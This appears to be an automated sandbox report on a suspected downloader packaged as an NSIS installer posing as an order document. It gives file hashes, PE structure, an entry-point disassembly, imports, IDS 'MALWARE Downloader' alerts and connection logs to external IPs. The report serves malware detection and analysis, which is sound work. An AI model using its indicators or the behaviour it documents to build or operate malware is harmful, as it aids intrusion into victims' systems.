                                                                                                                                                Preview:...................................................@......................................................................<....................................................O....../..........T.....................................i................................................................,.......................t.....................t.................................{!...................................................................................................X..........s.............@.............C....2................................-..............................w..............................................................H....................I........."..................C.................a................p...6.......................'......................................................................................%.............................x.................Q...................................z..........................i....hv...x.................`..........c.
                                                                                                                                                Process:C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-12, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 649037107316853453566312041152512.000000
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):286686
                                                                                                                                                Entropy (8bit):1.2536158727628404
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:3zbnVKpXfwz53wppkaub35azZSECekyln9KUXjJrv5YQ1ujVNDYb3ezsIhWCUiSL:KH4hI9iE3sLB9pXYzlkOYFWf9
                                                                                                                                                MD5:99A5E2E2953D0374F1E23FF8B0B6773F
                                                                                                                                                SHA1:5FC3F9C3638DD60012AB2F2ECDD016912BBDB9F3
                                                                                                                                                SHA-256:3D1233CB89AD10CCC6972697279A3741F6031E05D32738E9B34D37A230C0F84A
                                                                                                                                                SHA-512:1B002C12EAB187B0246483C5F3B0758DC84BCC884E1120A17B0412DFD349972DB5DA04E154AE21D405BA33BBD0C29AADFA7D1BF4D50347146D6DFCCBBD8DA94A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:.........................................|.........................F........................................................S..............................S.................................................................8....;........................^........................)......"..Y........B................d......................}.........i......................................9.....................................R...............]............................................................I.........u..................................j.....^.....................................................................W..................................................................................m......................................*.....................>..........O........[................................................B............................}..../...............................[.......?.............................Z..#.........................4...............................
                                                                                                                                                Process:C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):11776
                                                                                                                                                Entropy (8bit):5.890541747176257
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                                                                                                MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                                                                                                SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                                                                                                SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                                                                                                SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Conchoids12.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Korrekturlsning.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Conchoids12.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Korrekturlsning.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: rTransferenciarealizada451236.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: rTransferenciarealizada451236.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: MG-Docu6800001.exe, Detection: malicious, Browse
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                Entropy (8bit):7.740938089552925
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:ORDER 20240986 OA.exe
                                                                                                                                                File size:560'512 bytes
                                                                                                                                                MD5:9f036462b07002efdf646b0995217bbd
                                                                                                                                                SHA1:fbfd528f12735ecfa48f4d0fde42aef883e1c678
                                                                                                                                                SHA256:491cf03511ae77ed758d9b36f3237da0ef099370144ed61367146fee1c2bacee
                                                                                                                                                SHA512:860bb827f413215224c55c82f4760e99dd17fada85f7da1b568dc93736cc5dd17db1825acb1e18aad9b0e3c4e58649ef2a1f8227de25487970d06f2a2a21517c
                                                                                                                                                SSDEEP:12288:32EINTjsFYs9KzQ1HCgL/g4BC5fxjlzyZmd3ZhZv:3w5sxszMHLIvtyZmdPZv
                                                                                                                                                TLSH:38C4E050F15DE8D7F52B25B14C7ED530149BAB2C95B8520E32AA7A1E69E334310AFE0F
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....
                                                                                                                                                Icon Hash:38206a6a62666429
                                                                                                                                                Entrypoint:0x40336c
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                                                Instruction
                                                                                                                                                sub esp, 000002D4h
                                                                                                                                                push ebx
                                                                                                                                                push esi
                                                                                                                                                push edi
                                                                                                                                                push 00000020h
                                                                                                                                                pop edi
                                                                                                                                                xor ebx, ebx
                                                                                                                                                push 00008001h
                                                                                                                                                mov dword ptr [esp+14h], ebx
                                                                                                                                                mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                                                                call dword ptr [004080A8h]
                                                                                                                                                call dword ptr [004080A4h]
                                                                                                                                                and eax, BFFFFFFFh
                                                                                                                                                cmp ax, 00000006h
                                                                                                                                                mov dword ptr [007A8A2Ch], eax
                                                                                                                                                je 00007F6DB1371423h
                                                                                                                                                push ebx
                                                                                                                                                call 00007F6DB13746D5h
                                                                                                                                                cmp eax, ebx
                                                                                                                                                je 00007F6DB1371419h
                                                                                                                                                push 00000C00h
                                                                                                                                                call eax
                                                                                                                                                mov esi, 004082B0h
                                                                                                                                                push esi
                                                                                                                                                call 00007F6DB137464Fh
                                                                                                                                                push esi
                                                                                                                                                call dword ptr [00408150h]
                                                                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                cmp byte ptr [esi], 00000000h
                                                                                                                                                jne 00007F6DB13713FCh
                                                                                                                                                push 0000000Ah
                                                                                                                                                call 00007F6DB13746A8h
                                                                                                                                                push 00000008h
                                                                                                                                                call 00007F6DB13746A1h
                                                                                                                                                push 00000006h
                                                                                                                                                mov dword ptr [007A8A24h], eax
                                                                                                                                                call 00007F6DB1374695h
                                                                                                                                                cmp eax, ebx
                                                                                                                                                je 00007F6DB1371421h
                                                                                                                                                push 0000001Eh
                                                                                                                                                call eax
                                                                                                                                                test eax, eax
                                                                                                                                                je 00007F6DB1371419h
                                                                                                                                                or byte ptr [007A8A2Fh], 00000040h
                                                                                                                                                push ebp
                                                                                                                                                call dword ptr [00408044h]
                                                                                                                                                push ebx
                                                                                                                                                call dword ptr [004082A0h]
                                                                                                                                                mov dword ptr [007A8AF8h], eax
                                                                                                                                                push ebx
                                                                                                                                                lea eax, dword ptr [esp+34h]
                                                                                                                                                push 000002B4h
                                                                                                                                                push eax
                                                                                                                                                push ebx
                                                                                                                                                push 0079FEE0h
                                                                                                                                                call dword ptr [00408188h]
                                                                                                                                                push 0040A2C8h
                                                                                                                                                Programming Language:
                                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000x17000.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x64000x6400eed0986138e3ef22dbb386f4760a55c0False0.6783203125data6.511089687733535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0xa0000x39eb380x60009e0c528682cd2747c63b7ba39c2cc23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .ndata0x3a90000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .rsrc0x3c70000x170000x17000c8f8279129ad38fd03ee7b50a97e5aeaFalse0.21903659986413043data5.096977274603887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_BITMAP0x3c73880x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                                RT_ICON0x3c76f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.16976221459836743
                                                                                                                                                RT_ICON0x3d7f180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.32863070539419087
                                                                                                                                                RT_ICON0x3da4c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.42424953095684803
                                                                                                                                                RT_ICON0x3db5680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.30730277185501065
                                                                                                                                                RT_ICON0x3dc4100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.32445848375451264
                                                                                                                                                RT_ICON0x3dccb80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.2579479768786127
                                                                                                                                                RT_ICON0x3dd2200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6374113475177305
                                                                                                                                                RT_DIALOG0x3dd6880x144dataEnglishUnited States0.5216049382716049
                                                                                                                                                RT_DIALOG0x3dd7d00x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                                RT_DIALOG0x3dd9100x100dataEnglishUnited States0.5234375
                                                                                                                                                RT_DIALOG0x3dda100x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                RT_DIALOG0x3ddb300xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                RT_DIALOG0x3ddbf80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                RT_GROUP_ICON0x3ddc580x68dataEnglishUnited States0.7211538461538461
                                                                                                                                                RT_MANIFEST0x3ddcc00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                                                DLLImport
                                                                                                                                                KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                EnglishUnited States
                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-11-21T09:01:22.011646+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449783167.250.5.91443TCP
                                                                                                                                                2024-11-21T09:01:26.473582+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449794158.101.44.24280TCP
                                                                                                                                                2024-11-21T09:01:29.129872+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449794158.101.44.24280TCP
                                                                                                                                                2024-11-21T09:01:30.740019+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449806188.114.96.3443TCP
                                                                                                                                                2024-11-21T09:01:32.301732+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449812158.101.44.24280TCP
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 21, 2024 09:01:19.781229019 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:19.781292915 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:19.781399965 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:19.793339968 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:19.793359041 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:21.285192966 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:21.285294056 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:21.340665102 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:21.340708971 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:21.341073036 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:21.341142893 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:21.346440077 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:21.387336016 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.011671066 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.011714935 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.011748075 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.011780977 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.011801958 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.011837006 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.012099981 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.012176991 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.103574038 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.103600979 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.103667021 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.103703976 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.103734970 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.103749990 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.206017017 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.206046104 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.206090927 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.206124067 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.206137896 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.206167936 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.279685974 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.279712915 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.279766083 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.279793024 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.279808044 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.279841900 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.307468891 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.307497025 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.307570934 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.307600975 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.307650089 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.330885887 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.330914021 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.330965996 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.330976963 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.331016064 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.331034899 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.400980949 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.401002884 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.401102066 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.401133060 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.401184082 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.461359024 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.461384058 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.461435080 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.461469889 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.461488008 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.461512089 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.477374077 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.477395058 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.477459908 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.477483988 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.477526903 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.489284039 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.489304066 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.489357948 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.489381075 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.489393950 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.489442110 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.504374981 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.504394054 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.504466057 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.504486084 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.504527092 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.515858889 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.515896082 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.515934944 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.515954018 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.515984058 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.516021967 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.536968946 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.536990881 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.537066936 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.537092924 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.537136078 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.593091011 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.593108892 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.593174934 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.593204021 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.593781948 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.645174026 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.645200968 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.645314932 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.645349026 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.646579027 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.652040005 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.652062893 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.652133942 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.652151108 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.652178049 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.652198076 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.659863949 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.659908056 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.659948111 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:22.659956932 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.660010099 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.660260916 CET49783443192.168.2.4167.250.5.91
                                                                                                                                                Nov 21, 2024 09:01:22.660281897 CET44349783167.250.5.91192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:24.347749949 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:24.467793941 CET8049794158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:24.467952013 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:24.468339920 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:24.587845087 CET8049794158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:26.018054962 CET8049794158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:26.024735928 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                Nov 21, 2024 09:01:26.144179106 CET8049794158.101.44.242192.168.2.4
                                                                                                                                                Nov 21, 2024 09:01:26.421597958 CET8049794158.101.44.242192.168.2.4
